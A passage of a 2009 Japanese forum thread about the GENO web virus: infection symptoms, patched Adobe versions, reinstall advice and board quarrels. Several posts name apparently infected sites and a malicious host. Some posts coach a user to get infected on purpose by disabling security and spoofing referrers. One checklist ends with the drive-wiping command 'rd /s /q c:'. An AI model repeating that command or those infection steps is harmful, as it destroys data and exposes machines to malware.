512192.168.0.774:2009/05/18(月) 02:37:32 ID:ovjuZukc0
とりあえず、今日会社とか学校ある人は行き先のPCを要チェックかと。
セキュリティ部門の人とかが今回の件わかっていると被害を抑えることができるんだけど…

ベンダーが日本時間の月曜朝に対応するなんてありえないと思うし…

※まずはネットワークから切り離してhostsを変更してから再起動後に…
 諸々のファイルチェックして…って大変だなぁ…
513192.168.0.774:2009/05/18(月) 02:37:59 ID:yKeLT0rF0
>>506
同人板の方で盛り上がって火がついて燃え移ったというか巻き込まれたというか
サイト持ちの人が多いのもあるけど、もともと燃えやすい極端な人が多い

きちんと理解していて宥めてる人に対して
危機意識が足りないと噛み付いてる状態で、セキュ板も随分荒れた
(同人板が荒したってわけじゃなくて同人板から流れてきた人が原因でスレ住人が荒れた)
514192.168.0.774:2009/05/18(月) 02:40:05 ID:uebw+uxF0
いや、意外と潜伏期間ってこんなもんなんじゃないのかな。

>>504
こっちの方が優しく教えてくれると思うぞ
【管理も】同人サイト・GENOウィルス注意7【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242565127/l50
515192.168.0.774:2009/05/18(月) 02:41:31 ID:6Sa4e4kP0
誰かウイルスに確実に感染するサイト教えてください
とりあえず今のところ

成美堂出版 www.seibidoshuppan.co.jp/
livmail www.livmail.com/3others-page/janet/tokusen/index.htm
carwash www.carwash.co.jp/
senlights www.senlights.co.jp/seihin/kirenaru-1s.htm


を試してみました
誰かお願いします
516192.168.0.774:2009/05/18(月) 02:44:44 ID:yKeLT0rF0
>>515
まずアドベ製品のダウングレード
JSをオンにする。セキュリティソフトを解除
ファイアーウォールも解除

で閲覧すれば感染するかと
サイトが悪いんじゃ無くて環境のせいで感染しないんじゃない?
517192.168.0.774:2009/05/18(月) 02:45:21 ID:ovjuZukc0
こういうときは自宅警備員さんがうらやましい…かな?

うちの勤め先…絶対誰かGENO罠踏んでるだろうなぁ
本社の基幹でDenyしてくれてると安心なんだけど…
感染者には始末書というプレゼントが…(=ω=
518192.168.0.774:2009/05/18(月) 02:48:05 ID:O4S1nyz60
>>513
セキュ板のgenoスレも見てるから一応の流れは知ってる
確かにサイト持ってる友人もgeno騒動知らなかったみたいだったし
頻繁に2ちゃん覗いてないとそんなモンなのかねぇ…
519192.168.0.774:2009/05/18(月) 02:51:10 ID:yKeLT0rF0
>>518
更に砕くと
同人ノウハウの一つのスレで1回話題になってちょっと騒ぎになる
これは騒いで皆に知らせた方が良いということで同人板にスレが立つ
超盛り上がる。と言う感じ。たった一夜で連投規制のある板で凄い加速だよ

前々からこの手のタイプのウイルスはこんなもんでしょ
今回はけっこう広まってるからちょっと事情が違うけど
520192.168.0.774:2009/05/18(月) 02:51:22 ID:ua7Ctj4Z0
521192.168.0.774:2009/05/18(月) 02:52:28 ID:d0ClE+9g0
>>513
同人板はカード番号抜かれるとかもう無茶苦茶言ってる奴がいるw
わからないことはわからないでいいのに異常なまでの恐怖心を煽るようなことを言うからゆとりが流れ込んでくるんだよ
自業自得だ
522192.168.0.774:2009/05/18(月) 02:56:34 ID:ImVScTUk0
>>499
これで割れのacrobatはすべて使い物にならなくなるワケだ.
adobeはホルホルしてるだろうなw
523192.168.0.774:2009/05/18(月) 02:57:45 ID:o7Ns7JFwP
>>521
それはないとは言い切れないよ
524192.168.0.774:2009/05/18(月) 02:59:22 ID:uebw+uxF0
>>521
感染サイトにまで誘導してる奴まで現れる始末だしな。
正直、彼らとは距離を置きたい。巻き添えくいそうでたまらんよ。
525192.168.0.774:2009/05/18(月) 03:00:28 ID:PGXf1oVHO
ケータイからPCブラウザ見るぶんには大丈夫なんでしょ?
526192.168.0.774:2009/05/18(月) 03:00:50 ID:3Vb3xWiS0
このウィルスなんて読むの?じぇの?げの?
527192.168.0.774:2009/05/18(月) 03:01:08 ID:/yFIekht0
★危険★
これも感染?
www.seibidoshuppan.co.jp
528192.168.0.774:2009/05/18(月) 03:02:06 ID:o7Ns7JFwP
>>527
してるね
529192.168.0.774:2009/05/18(月) 03:02:24 ID:g3jcf+6w0
同人板って他のν速やvipやここのウイルス対策スレと
明らかに毛色というかノリというか湿度が違う気がする
なんかこわい
530192.168.0.774:2009/05/18(月) 03:04:32 ID:wbZLj6zq0
>>527
GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
評価ミス報告
531192.168.0.774:2009/05/18(月) 03:04:48 ID:7HSqf6Si0
>>529
ネチネチした連帯感みたいなのがあるな。
自治好きが多いんだと思う。
532192.168.0.774:2009/05/18(月) 03:05:50 ID:6Sa4e4kP0
>>516
>>515に追記します
>>515のサイトを踏んだ結果
成美堂出版はなんともなく
他3つのサイトではトロイが検出されました
けど感染したいウイルスはGENOです

現在の環境は
Windows XP Home SP3
IE6
reader 8
flash player 9
JS有効
セキュリティー無効
ファイアーウォール無効

です。

他にGENOに感染するための条件はなにかありますか?
533192.168.0.774:2009/05/18(月) 03:07:29 ID:PGXf1oVHO
何故感染したがる
534192.168.0.774:2009/05/18(月) 03:08:21 ID:eVa+R5Lo0
>>520
送信先はウクライナか・・・
しかし、北アメリカとかヨーロッパ全土が感染とは・・・
535192.168.0.774:2009/05/18(月) 03:09:04 ID:6Sa4e4kP0
>>533
○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが勝手に動いてないか確認
・Acrobat(Adobe Reader?)が勝手に起動
・CPU使用率をチェック
・PDFファイルやシステムファイルが増殖してるかチェック
・cmdでdir C:\WINDOWS\system32\sqlsodbc.chmのサイズが50,727か確認
・最後cmdからrd /s /q c:を実行

○検証するブラウザ
IE6
IE7
IE8
Firefox 3.0.10
Opera 9.64
Chome 1.0.154.65

を自分で検証してみたい
536192.168.0.774:2009/05/18(月) 03:09:23 ID:ZooZ8biq0
>>531
同人女は他人から見たら馬鹿としか思えないローカルルールが多く、それらを守らないとヲチというリンチに遭う
危機感煽ってるくせに感染サイト晒せないのはそのせいだね
大いなる矛盾なんだが
あそこ見てると葬式の時だけはりきってる普段は地味なおばさんを思い出す
537192.168.0.774:2009/05/18(月) 03:11:10 ID:gtQ58YdFO
ラトビアでも流行ってると聞いたぞ
538192.168.0.774:2009/05/18(月) 03:12:31 ID:yKeLT0rF0
>>533
検体ほしいとか?

>>532
成美堂出版はソースは真っ黒だったんだが
ウイルスの搬入先が死んでるとこだったのかね?
539192.168.0.774:2009/05/18(月) 03:13:01 ID:PGXf1oVHO
>>535
ご、ごめん
解りやすく説明して

目的だけ
540192.168.0.774:2009/05/18(月) 03:15:15 ID:7HSqf6Si0
クリーンインストールすりゃ良いって分かってんだから、
予備のPC使って自分で確かめたいって奴もいるだろう。
541192.168.0.774:2009/05/18(月) 03:16:23 ID:uebw+uxF0
>>535
まさか感染したまま、満員電車に乗るような感じのことをするんじゃないだろうな。
542192.168.0.774:2009/05/18(月) 03:16:43 ID:vNF2317C0
>>537
えーと、バルト三国って北欧?なのかな
あそこらへんはIT強い国いくつかあったしそっちにも行きそうだ
ヨーロッパ・北アメリカ・北欧ときたらそろそろインドや東南アジア辺りもヤバそう
543192.168.0.774:2009/05/18(月) 03:18:25 ID:6Sa4e4kP0
>>538
他のスレでもそう聞いたよ

>>539
単なるブログのネタだよ
かれこれ6時間以上GENOウイルスを求めてさまよってる・・・
俺はただSSと検証レポをしたいだけなのに(´;ω;`)
まさかこんなに時間がかかるとは思わなんだぞ
544192.168.0.774:2009/05/18(月) 03:18:33 ID:yKeLT0rF0
>>536
同人女って言うかあの板がおかしいんだよ
類友のはずのノウハウ板はそうでもないし
同人板から移転が相次いで最近はあっちも大変らしいが。
545192.168.0.774:2009/05/18(月) 03:19:11 ID:XWeKEH7q0
>>535
・XP以下のWindowsでアクセスする。
・Adobe Readerをインストールしている。
・Flash Playerをインストールしている。
・JavaScriptを有効にする。
・Chrome以外のブラウザでアクセスする。
・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・過去に攻撃サイトにアクセスしたことがあり、その際cookieが有効だった場合はcookieを削除する。以後cookieを拒否する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える
・セキュリティソフトを使用しない。

以上の条件を満たすことが必要。
これでも感染しないようであれば

・Adobe Reader、Flash Playerのバージョンを下げてみる
・仮想マシンを使っているならば、実機で試してみる
・NX bitが実装されているCPUを使用しているならば、実装されていないCPUを使用する
546192.168.0.774:2009/05/18(月) 03:20:17 ID:gtQ58YdFO
>>542
ラトビアはバルトで北欧地方だ
イギリスでもGENOかは分からないがウイルスが流行ってると聞いたが…これは定かじゃない
誰か知ってるやついるか
547192.168.0.774:2009/05/18(月) 03:21:12 ID:w3XVYZKL0
>>521
可能だろ、何言ってるんだ
548192.168.0.774:2009/05/18(月) 03:21:23 ID:PGXf1oVHO
>>540
なんだ…そんだけか


>>541
そしたらどうなるんですか?(;゚Д゚)ゴクリ...
549192.168.0.774:2009/05/18(月) 03:21:45 ID:wsKEiiw60
>>535
>・最後cmdからrd /s /q c:を実行

パニックにつけ込んだデマって怖いね
550192.168.0.774:2009/05/18(月) 03:22:05 ID:yKeLT0rF0
>>543
わかったちょっと待ってて
いくつか候補はあるんだが、すでに対応きてるかもだからからちと確認してくる
551192.168.0.774:2009/05/18(月) 03:23:16 ID:gtQ58YdFO
そういえば俺のパソコン感染して初期化した
GENOウイルスらしきものは見つからなかったがネットワークに接続できない
まさか今もパソコン内部に潜んでて進化してるなんてことないよな
552192.168.0.774:2009/05/18(月) 03:24:28 ID:SGBG03gk0
>>543
すでに1つDLしてたら24時間はDLできないって誰かが言ってた
しそこねたことがあったのかもしれない
IP変えられるならそれで挑戦してみるのも手かも
553192.168.0.774:2009/05/18(月) 03:25:38 ID:yKeLT0rF0
>>549
感染したら最後はそれでフィニッシュしないとw
アンチソフトでの駆除できないんだし。不思議なことはないよ

>>543
リボンマジックでググってみてくれ
このサイトもまだ対応してないっぽい。ソースが黒い
554192.168.0.774:2009/05/18(月) 03:25:56 ID:Z5hmtXFr0
774 名前:geno[sage] 投稿日:2009/05/18(月) 03:24:56 ID:E9Mwu5RAP
296 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/18(月) 03:20:10
なんか同人スレは「質問はセキュリティ板へ行け」みたいに言ってるぞw
なんでセキュ板がそこまで面倒みてやらなならんのだと・・・
しかも親切に質問に答えてやってると「セキュリティ板に乗っ取られてる!!」とかw

もうねアフォか馬鹿か同人かと・・・
555192.168.0.774:2009/05/18(月) 03:26:01 ID:PGXf1oVHO
>>543
レポートかw
確かにブログネタにしたら訪問者増えるよね、きっと


怖くて今ケータイからやってるんで力になってあげられないけど

同人サイトとかランキングとか同人サイトのリンクから梯子したりすれば見つかるんじゃない?
556192.168.0.774:2009/05/18(月) 03:27:13 ID:uebw+uxF0
>>543
海外サイト漁った方が早いぞ。
あっちのほうがいいかげんだから。
sqlsodbc.chmで検索かけてそこのページから飛ぶのだ。
557192.168.0.774:2009/05/18(月) 03:27:21 ID:pFQN0G770
>>543
Reader8で感染できなかったので9.0.0にしたら感染できた、たまたまかも知れないが
成美堂のtuz.cnは死んでる
あとIP変えまくれ
558192.168.0.774:2009/05/18(月) 03:27:56 ID:7HSqf6Si0
面白い流れになってきたなw
559192.168.0.774:2009/05/18(月) 03:29:39 ID:WSfvVExd0
>>557
>>207
Flash Playerは10.0.22.87と9.0.159.0がGENO関連の脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0がGENO関連の脆弱性を修正したver

以降は別の脆弱性を修正したver
560192.168.0.774:2009/05/18(月) 03:29:45 ID:gtQ58YdFO
外も中もウイルスだらけだな…(´д`)
561192.168.0.774:2009/05/18(月) 03:30:55 ID:6Sa4e4kP0
>>545
サンクス

とりあえず上の項目は全部試してる

ただ下の項目の下二つは
VMware上のXPでAthlon 64 X2 5600+だから
条件をクリアできてないな

>>549
まぁそれは今回の検証のオチってやつだよw

>>550
おねがいしますm( __ __ )m

>>552
IPはいろいろあって何度も変えてる
けど感染してない

>>553
一応リボンマジックも直接URLを入力して踏んでみた
けど感染しなかった

>>555
一月ぶりぐらいにかくブログですw
562192.168.0.774:2009/05/18(月) 03:32:07 ID:pFQN0G770
>>559
おお、そういうことだったのかありがとう
563192.168.0.774:2009/05/18(月) 03:32:57 ID:SGBG03gk0
実はすでに感染してるんじゃね・・・?
564192.168.0.774:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。

>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
565192.168.0.774:2009/05/18(月) 03:34:39 ID:CVgAB4qkP
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。

>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
566192.168.0.774:2009/05/18(月) 03:35:19 ID:Z5hmtXFr0
565 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:34:39 ID:CVgAB4qkP
564 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 03:33:28 ID:WSfvVExd0
778 名前:GENO[sage] 投稿日:2009/05/18(月) 03:31:36 ID:0ntxn30Q0
>>771>>775
>>774の書き込みが証明しているとおり、奴らがこの板で回答する限り、徹底スルーってのは無理だから。
セキュリティ板の荒らしどもがこのスレに常駐している限り、いつまでも初心者の質問が来続ける。
つーか「アフォかと…」はどっちなのかと。
「親切に答えてやってるのに」とかほざいてますが、お前らに自覚がないだけで、同人板にとっては実質荒らしだっつの。

>>776-777
同意。完全に板違いなのに肯定されてるのがどうかしてる。
567192.168.0.774:2009/05/18(月) 03:35:33 ID:PGXf1oVHO
>>560
まったくですね、新型インフルエンザ流行ってるから外出控えようと思って家でPCしようと思ったらウイルスが出回ってて、なんだかなー;
>>561
良い記事書いてくださいな(・∀・)オーエン


海外の二次創作サイトって感染してる所あるのかな

それともアダルトサイトの方が感染しやすいとか?
568192.168.0.774:2009/05/18(月) 03:35:42 ID:yKeLT0rF0
>>561
ティアラモードと株式会社まどかももう試してるだろうな
どうにも引っかからない環境にいるようにしか見えない
後は同人サイト巡りしかないわー
569192.168.0.774:2009/05/18(月) 03:36:13 ID:uebw+uxF0
>>564-565
おまえら……

ま、同人板には関わらないのが正解ってことだ。
570192.168.0.774:2009/05/18(月) 03:37:43 ID:gtQ58YdFO
外出もままならない、ネットもできない今、やることはポケモンしかねえ…
571192.168.0.774:2009/05/18(月) 03:38:11 ID:bnpUDzMr0
今日はウイルスの恐ろしさとストーカーの恐ろしさを知ることが出来た
572192.168.0.774:2009/05/18(月) 03:38:39 ID:6Sa4e4kP0
>>556
ちょっとググってみます

>>557
そういやリボンマジックじゃ
IP変えてないからちょっと試してみます

>>563
今のところsqlsodbc.chmのサイズは変化なし
再起動後も通常起動確認

>>567
ありがと

>>568
その二つはまだ踏んでないです・・・
今から踏んできます
573192.168.0.774:2009/05/18(月) 03:40:03 ID:SGBG03gk0
>>572
レジストリの確認はした?
574192.168.0.774:2009/05/18(月) 03:40:25 ID:XWeKEH7q0
>>545
ちょっと説明が不十分なので修正

× ・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
○ ・ロケーションバーにmartuz.cnを打ち込んでアクセスするのではなく、感染サイトからアクセスする。リファラを切っている場合は有効にする


>>561
となるとやはりredearとflashのバージョンかな。
reader 8.1.2、flash 9.0.115以下あたりではどうだろう。
575192.168.0.774:2009/05/18(月) 03:41:55 ID:O4S1nyz60
豚インフルとgenoウイルスの発見が同時期くらい
豚インフルの国内初感染者確認と同人板の感染者騒ぎがほぼ同時
あっちもこっちも絶妙なタイミングで大変だな
576192.168.0.774:2009/05/18(月) 03:43:26 ID:x3CeUoiK0
まさかGENOウイルスなんてなかった、なんてことはないよな?
577192.168.0.774:2009/05/18(月) 03:45:41 ID:gtQ58YdFO
>>576
それは一体どういうことだ?
578ひみつの文字列さん:2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
579192.168.0.774:2009/05/18(月) 03:48:56 ID:x3CeUoiK0
>>577
そのまんまの意味。
何か普通のウイルスの広がり方と違う気がする。
検証実験も妙に少ないし。
580192.168.0.774:2009/05/18(月) 03:52:06 ID:6Sa4e4kP0
>>573
中身までは確認してないけど
起動はするみたいです

>>574
現在のヴァージョンは

reader 8.1.2
flash player 9.0.159.0
ですね

flash playerをもっとダウングレードしてみます



それととりあえずティアラモードと株式会社まどかを
踏んでみたけど感染症状なし

>>578
ちょっと試してみます
581192.168.0.774:2009/05/18(月) 03:54:51 ID:PGXf1oVHO
でっち上げかもね
582192.168.0.774:2009/05/18(月) 03:55:50 ID:SGBG03gk0
>>580
なかみのほう
auxのだけど>>578さんのできっとおkだね
583192.168.0.774:2009/05/18(月) 03:57:20 ID:VzSgGubRO
これ、感性の可能性あるのはWindowsのみ?
マックは平気なのかな?
584192.168.0.774:2009/05/18(月) 03:58:27 ID:6Sa4e4kP0
>>578>>582
試してみた
ttp://www.dotup.org/uploda/www.dotup.org39349.png

やっぱり無事?なのかな?
585192.168.0.774:2009/05/18(月) 04:00:07 ID:e2dzUe840
自分のPCが感染してるかどうか
確実に確認できるウイルスチェッカー教えてください
586192.168.0.774:2009/05/18(月) 04:00:41 ID:gtQ58YdFO
>>579
確かに感染の波は少し変わってるが、存在そのものを否定するのは難しいぞ。
現に俺のパソコン感染したからな。まとめwikiに記載されてた症状と一致しまくった。
だがウイルスという名義で別の目的の用途をなしていたとしたら…それもそれで考えは広がるが。
(個人的な想像、もしもまとめwikiそのものがウイルスでっちあげ&発祥源だったらカオス)
587192.168.0.774:2009/05/18(月) 04:00:41 ID:PGXf1oVHO
一応聞かせて、ケータイでPCブラウザ見ても感染しないよね?
588192.168.0.774:2009/05/18(月) 04:03:45 ID:gtQ58YdFO
>>578
それはわからん。ただ携帯のフルブラウザで開くと感染の疑いがあるらしい。ただの携帯のインターネットなら問題ないが、PCページはどうかは不明だな。
調べても情報が入り混じっていて自分で確かめるしか確かな情報は得られないと思う…。
589192.168.0.774:2009/05/18(月) 04:04:49 ID:x3CeUoiK0
>>586
まぁさすがに何もないってことはないかw
ただちょっと作為を感じるよね。しばらく経過を見守るしかないか。
590192.168.0.774:2009/05/18(月) 04:06:23 ID:yKeLT0rF0
>>587-588
無い無い
ウイルス貰う事ができてもウイルスが動ける場所が携帯にはない。
PCように設計されてるウイルスだから、PCのシステムファイルがないと
役立たずだよ。MACやゲーム類もそうだよ。
携帯でブラウザ見れても、Windows専用ゲームとかはできないだろ
591192.168.0.774:2009/05/18(月) 04:08:31 ID:e2dzUe840
>>578
うちのXPが今のところ
sqlsodbc.chm → 1323バイト
regedit → 起動できず
cmd → 問題なし
タスクマネージャのsvchost → 問題なし

なんだけど、そっちのツールだと
「みつからなかったけど油断しないで下さい」だった。
これはどうなの?
592192.168.0.774:2009/05/18(月) 04:09:17 ID:yKeLT0rF0
>>591
アウト
593192.168.0.774:2009/05/18(月) 04:09:24 ID:gtQ58YdFO
>>589
作為…ちょっと同意。
ああ、様子見して鎮静化を待つのがいいな。だが鎮静化せずに余計騒ぎがあがったら大変だろうなw
594192.168.0.774:2009/05/18(月) 04:10:43 ID:e2dzUe840
>>592
うるさいうるさいうるさい
595192.168.0.774:2009/05/18(月) 04:11:15 ID:PGXf1oVHO
>>588
(;゚Д゚)

やっぱりフルブラウザは感染する可能性も無いと言えないんだね

フルじゃなければ良いのかな…

てかケータイの場合、感染したらどういった影響を及ぼすのか解らない…


だれか情報見つけたら教えてくださいませー(-人-)

自分で確かめるのは怖くて
596192.168.0.774:2009/05/18(月) 04:11:39 ID:JmCcr4Q60
>>591
sqlsodbc.chmダブルクリックしてもヘルプ開かないだろ?
ご愁傷様です。OS再インストールガンバレ
597192.168.0.774:2009/05/18(月) 04:11:45 ID:gtQ58YdFO
>>590
そうか、ありがとう。
じゃあ携帯での調べは安全にできるってことだな。
598192.168.0.774:2009/05/18(月) 04:13:26 ID:gtQ58YdFO
>>595
>>590
大丈夫みたいだぞ
599192.168.0.774:2009/05/18(月) 04:13:28 ID:RvJr4U680
最新のウィルスが来たんだって?
テンプレを読んでも分かりにくい・・・
できれば画像か動画はないか?
600192.168.0.774:2009/05/18(月) 04:13:42 ID:PGXf1oVHO
>>590
そうなんですか

安心した。


ケータイで同人サイトを経営してる自分は勝ち組ですな!
601192.168.0.774:2009/05/18(月) 04:13:47 ID:wsKEiiw60
少なくとも、SymantecやKasperskyよりは仕事してるようだが、『 ファイルを無断で削除 』してくれた
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)

一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→ ttp://onecare.live.com/site/ja-jp/default.htm

>>424より



>>591試す価値あるかもあくまで自己責任で
602192.168.0.774:2009/05/18(月) 04:15:42 ID:RX899dBK0
>>591
martuz.cnから落ちてきた検体踏んだら同じ症状で
「みつからなかったけど油断しないで下さい」だった
アウト
603192.168.0.774:2009/05/18(月) 04:16:37 ID:gtQ58YdFO
初期化後のデスクトップの何もなさははんぱなさすぎて感動するぜ、ファイト
604192.168.0.774:2009/05/18(月) 04:22:28 ID:mLA05Iwx0
今ウィンドウズモバイル搭載のスマートフォンで成美堂のURL踏んできた

イーモバイルのS21HT

IEとオペラでアクセスしたんだが別に動作が重たくなったりする訳でもなく大丈夫っぽいわ

携帯に感染しないのは分かってたが、ウィンドウズモバイルだとどうか分からなかったのでとりあえず人柱報告。
だからといって他の携帯が全て感染しないとは言い切れないのでその辺は自己責任な
605192.168.0.774:2009/05/18(月) 04:28:01 ID:MnmraP/O0
誤って成美堂のトコ踏んじゃったんだけど
sqlsodbc.chmは50.727でregeditとcmdも
起動したから問題無いかな?マジで不安だ……
606192.168.0.774:2009/05/18(月) 04:28:48 ID:dmXVT3NS0
>>604
俺も踏んできたわ
機種はウィルコムのW-ZERO3[es]

こっちも特に怪しい挙動はないな
いまんとこウィンドウズモバイルは大丈夫っぽい?かな?
607574:2009/05/18(月) 04:31:54 ID:x0S5Vdnh0
一応こっちでも回線をつなぎ変えて踏んでみたが、pdf、swfが落ちてこない。
串を通して踏んだら落ちてきた。
どうもうちのISPの一部または全部がmartuz.cnに焼かれているようだ。
他にも検体が落ちてこない人はISPごと焼かれているのかもしれない。
608192.168.0.774:2009/05/18(月) 04:32:46 ID:e2dzUe840
>>596
ダブルクリック・・・、してみた。
ちくしょーヘルプひらかねえわ。
609192.168.0.774:2009/05/18(月) 04:32:47 ID:RvJr4U680
結局画像か動画で取れたやついないの?
これじゃあ、どんな危険なのか良く分からん
俺が調べたところでは

・情報が盗まれる可能性があり

・つかまったらインスコ以外脱出不可 PCの中身があぽーん行き

・対処しようとしても勝手にメモリが食ってブルースクリーンにされる

という感じだな
610192.168.0.774:2009/05/18(月) 04:34:20 ID:e2dzUe840
>>601
こうなったらなんでもやらせてもらう
毒を食らわば皿まで
611192.168.0.774:2009/05/18(月) 04:37:37 ID:JmCcr4Q60
>>609
動画取ってどーすんだ?ブラクラじゃあるめーし目で見て判るようなウィルスだったら誰も苦労しねーよw
612192.168.0.774:2009/05/18(月) 04:41:13 ID:gb9ZDt5LO
>>591
どうみても完全に妖精です。
ヘルプファイルは46KB(英語)か50KB(日本語)以外アウト
加えてレジストリエディタ起動不能
コマンドプロンプト起動で重症化するかも
さっさとバックアップ取って再インストールしろ
613192.168.0.774:2009/05/18(月) 04:44:22 ID:V/AoiShOO
FC2ブログは感染しないよね?
それだけ教えて
614192.168.0.774:2009/05/18(月) 04:44:24 ID:k2CI1leb0
>>607
同じIPからの接続の場合、一定時間スリープするらしい。
時間を置かないと検体が拾えない。

で、>>578見てて思ったんだけど、Adobeの脆弱性がある環境なら、
ウィルス側がVistaを除外する必要ないよな。
HKLMの改変やProgram FilesやWindows以下のフォルダをいじると
UACが発動しちゃうけど、Users以下のフォルダに実体を置いて、
HKCU以下のレジストリ(\Software\Microsoft\Windows\CurrentVersion\Run)とか
なら発動しないでしょ。Adobe Updaterあたりに偽装したアプリでも仕込んで
おけばその後ユーザーにUAC昇格ダイアログでボタンを押させることも
できちゃうだろうし。
615192.168.0.774:2009/05/18(月) 04:44:50 ID:e2dzUe840
>>612
多分ダメなのは薄々わかってる
データのバックアップとるエリアがなくて悩んでんのよ
メーラのスパムブロックとかの設定もふくめたら
一日じゃとても終わらん
616192.168.0.774:2009/05/18(月) 04:46:47 ID:RvJr4U680
>>611
いや、メモリが異常なくらいは誰でも分かりそうな気がするんだがな・・・
ガジェットを使えばメモリーはデスクトップで見れるし
617192.168.0.774:2009/05/18(月) 04:49:09 ID:gb9ZDt5LO
>>615
落とすとBSODで再起不能になるかもしれないから電源オプションから電源切れないように設定して、
電気屋開くのを待って外付けHDDでも買ってこい
618192.168.0.774:2009/05/18(月) 04:49:15 ID:uebw+uxF0
>>608
完全にアウトだな。
素直に再インスコしとき。
619192.168.0.774:2009/05/18(月) 04:51:19 ID:Zugt4NPJO
今言われてるレジストリに残る形跡って具体的にどんなのなんだ
件のchmファイルは正常動作してるけど…
620192.168.0.774:2009/05/18(月) 04:51:40 ID:c4TnzPSv0
>>604
>>606
おお、人柱感謝。
ZERO3es持ちで、念のためOperaのJavaスクは無効にしておいたけど
その件すごく気になってたからすごく助かる。
621192.168.0.774:2009/05/18(月) 04:52:08 ID:/4TBD5OI0
>>615には不謹慎な質問だけど
感染したサイトがわかるなら教えてくれないか?
622192.168.0.774:2009/05/18(月) 04:52:41 ID:JmCcr4Q60
>>615
書き込みは別PCor携帯か?まさかと思うが感染濃厚なPCで書き込みしてねーだろうな?
もしそうならさっさとLANひっこ抜いてバックアップどうすっか考えろ
623192.168.0.774:2009/05/18(月) 04:52:51 ID:DIbDMt2D0
>>615
完全にアウト
自分も感染してリカバリ組だけど>>591の症状とほぼ一致というか
regeditも起動してアンチウイルスサイト関連にも繋がったけどやられてた
重症化する前にあきらめて対策とった方がいいよ、頑張れ
バックアップも感染してるの残さないように慎重にな
624192.168.0.774:2009/05/18(月) 04:52:53 ID:iUubSaQo0
とりあえずシステムの復元で問題なく使えているが
大事なID・パスワード入力はキーログされない
ソフトウエアキーボード入力にするわ

ttp://www.vector.co.jp/soft/win95/util/se040870.html
625192.168.0.774:2009/05/18(月) 04:54:03 ID:e2dzUe840
>>617
実は再起動はもう何回もやってたりしてる
最初はregeditできてたが再起動したらできなくなったけど
626574:2009/05/18(月) 04:56:11 ID:x0S5Vdnh0
>>614
>同じIPからの接続の場合、一定時間スリープするらしい。

その問題を回避するためにルータ再起動してIPを変えてみたんだが、
相変わらず検体は落ちてこない。
たぶんISPごと焼かれてるんだと思う。
もしかするとこれも時間が経てば落ちてくるようになるのかもしれないけど。
627192.168.0.774:2009/05/18(月) 04:56:40 ID:RvJr4U680
本当にGENOウイルスは世界最強だな
対処法はなし ウィルスセキュリティで検索しても引っかかりにくい つかまったらインスコしかなくPC中身はあぽーんされる

もう、各機関に通報されてもいいレベルだな と言っても既に見つかって対処法を考えてるだろうな
628192.168.0.774:2009/05/18(月) 04:57:09 ID:uebw+uxF0
かかりたい人間には、なかなかかからない。
インフルエンザにかかって学校を休みたい学生の気分だな
629192.168.0.774:2009/05/18(月) 04:57:56 ID:PGXf1oVHO
ケータイからなんだけど

感染してそうな同人サイトみつけた


30分前にアクセスした同人サイトの日記にGENOウイルスについての記事書いてあって

今もう一度そのサイト開いたらページが表示できなかった
630192.168.0.774:2009/05/18(月) 04:58:54 ID:/4TBD5OI0
>>628
まさにその通りだ
俺はこんなにも感染したいというのに!
631192.168.0.774:2009/05/18(月) 04:59:14 ID:JmCcr4Q60
>>624
ポインタクリックした時点のポインタ周辺の画像転送してID、PASS抜きってものあるので
ソフトウェアキーボードでも確実に安全っつー訳じゃないからなぁ…
主にネトゲのPASS抜きトロイで使われる手法だけどね
632192.168.0.774:2009/05/18(月) 05:00:38 ID:e2dzUe840
>>623
そうなのか、ありがとう。
こうなったらハードディスク増設するか安いし。
でもうちPCまだIDEだしな、うーん。
633192.168.0.774:2009/05/18(月) 05:01:01 ID:4oFiJRbxO
ジャバスクリプトとアクティブコントロール切ればie
634192.168.0.774:2009/05/18(月) 05:02:26 ID:PGXf1oVHO
>>629
あ、ゴメン
一時的な物だった;


なかなかないなー
635192.168.0.774:2009/05/18(月) 05:04:12 ID:uebw+uxF0
>>632
IDE→SATAの変換コネクタをかってきたらどうだ?
これとかいいよ。

SATA+IDE HDD つなが〜るKIT USB light
http://www.novac.co.jp/products/hardware/nv-hd/nv-tw130u/index.html
636192.168.0.774:2009/05/18(月) 05:05:38 ID:k2CI1leb0
>>624
キーロギングじゃなくてネットワークトラフィックを監視しているっぽいよ。
だから平文パスワードが流れるftpは思いっきりぶっこ抜かれるんじゃないかと。

>>626
そっか。それはすまんかった。
